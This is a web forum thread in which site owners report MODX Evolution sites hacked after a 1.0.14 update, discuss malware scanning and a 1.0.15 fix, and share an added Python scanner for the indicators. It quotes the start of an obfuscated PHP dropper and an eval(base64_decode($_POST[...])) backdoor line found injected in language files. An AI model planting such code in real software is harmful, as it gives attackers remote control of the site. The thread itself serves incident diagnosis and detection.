-
- 230 Posts
got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked. we checked all files before updating, removed nearly all plugins (it's a nearly static page), and got files in the manager /includes like
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] =
.....
file was dated 10.10.2014
update: also files within /modules/docmanager/lang/ are modified with
eval(base64_decode($_POST['ne1bfba']));?><?php ....
[ed. note: spackko last edited this post 9 years, 6 months ago.]
-
- 230 Posts
Quote from: Jako at Oct 24, 2014, 09:28 AM
Quote from: spackko at Oct 24, 2014, 05:49 AM
got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.
Do you have any access log for this?
will check that later
-
- 409 Posts
It looks like several of us have had the same problem for 2 months.
I can understand this problem is hard to solve.
I'm trying to use the Linux tool maldet to detect any malware in the evo directory, but I haven't found anything for now.
Now, my server is grey/black listed because of spam and I'm thinking of moving all Evo websites to another dedicated server. But of course, that's not the solution. Another "issue" is to "upgrade" these websites to Revo, but it's also a lot of work...
I don't know how I can help the dev team find the issue.
I'm not sure log file analysis is a solution because the creation date stamp of an incriminated file can also be changed by the malware...
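Added example, not posted by anyone in this thread and not MODX code: a content-based scan for the two patterns quoted above (`eval(base64_decode($_POST[...]))` and function names assembled from `$r76[NN]` lookups into `$GLOBALS`), which ignores file dates entirely since they can be altered. The indicator names, the 2 MiB size limit and the sample files are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Content heuristics modelled on the two snippets quoted in this thread.
INDICATORS = {
    # eval() fed directly from decoded request data
    "eval-decoded-request": re.compile(
        rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
    # function names spelled out by indexing a lookup string: $r76[94].$r76[24]...
    "string-table-indexing": re.compile(rb"(?:\$\w+\[\d+\]\s*\.\s*){5,}\$\w+\[\d+\]"),
    # $GLOBALS['vtton6'] = ... style assignments to random-looking keys
    "globals-random-key": re.compile(rb"\$GLOBALS\[\s*'[a-z]{3,8}\d{1,3}'\s*\]\s*="),
}
MAX_BYTES = 2 * 1024 * 1024  # assumption: skip files larger than 2 MiB

def scan_bytes(data: bytes) -> list[str]:
    """Return the sorted names of all indicators present in one file's content."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))

def scan_tree(root: str) -> dict[str, list[str]]:
    """Walk root and report every file with at least one hit.

    File dates are ignored on purpose; only content is inspected.
    """
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.stat().st_size > MAX_BYTES:
            continue
        hits = scan_bytes(path.read_bytes())
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo() -> dict[str, list[str]]:
    """Scan a throwaway tree of constructed sample files."""
    samples = {  # constructed inputs, not files recovered from a real site
        "index.php": b"<?php echo 'hello'; ?>",
        "manager/includes/a.php": b"<?php $t=\"abcdef\"; $GLOBALS['vtton6'] = "
                                   b"$t[0].$t[1].$t[2].$t[3].$t[4].$t[5].$t[1]; ?>",
        "lang/en.inc.php": b"<?php eval(base64_decode($_POST['k']));?><?php $_lang=[]; ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Calling `scan_tree()` on the web root lists files to review by hand; a hit is a lead, not proof, and a clean result does not show the site is clean.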
-
- 11 Posts
I'm pretty sure the security flaw has been fixed in 1.0.15, which was released a couple of days ago.